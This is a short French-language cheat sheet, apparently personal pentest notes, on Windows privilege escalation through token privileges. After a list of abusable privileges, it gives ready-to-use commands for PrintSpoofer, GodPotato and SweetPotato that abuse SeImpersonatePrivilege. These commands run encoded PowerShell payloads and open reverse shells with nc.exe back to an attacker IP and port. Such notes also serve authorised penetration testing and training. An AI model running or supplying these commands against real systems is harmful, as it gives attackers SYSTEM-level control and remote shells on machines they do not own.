Privilege Windows
Plusieurs tokens d’accès pouvant mener à une élévation de privilège:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
Ressources:
SeImpersonatePrivilege
Plusieurs outils permettent d’exploiter ce privilège
.\printspoofer.exe -i -c "powershell -noP -sta -w 1 -enc <payload>
Godpotato est l’une des “patates” permettant d’abuser de ce privilège. L’intérêt de celui-ci c’est qu’il compile les techniques de plusieurs autres (RottenPotato, JuicyPotato, etc.)
.\GodPotato-NET4.exe -cmd "powershell -e <payload>"
.\GodPotato-NET4. -cmd "c:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $ATTACKER_IP $ATTACKER_PORT"
Une autre alternative à surveiller: https://github.com/lypd0/DeadPotato/
# Todo: voir si le powershell est vraiment nécessaire
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "c:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $ATTACKER_IP $ATTACKER_PORT"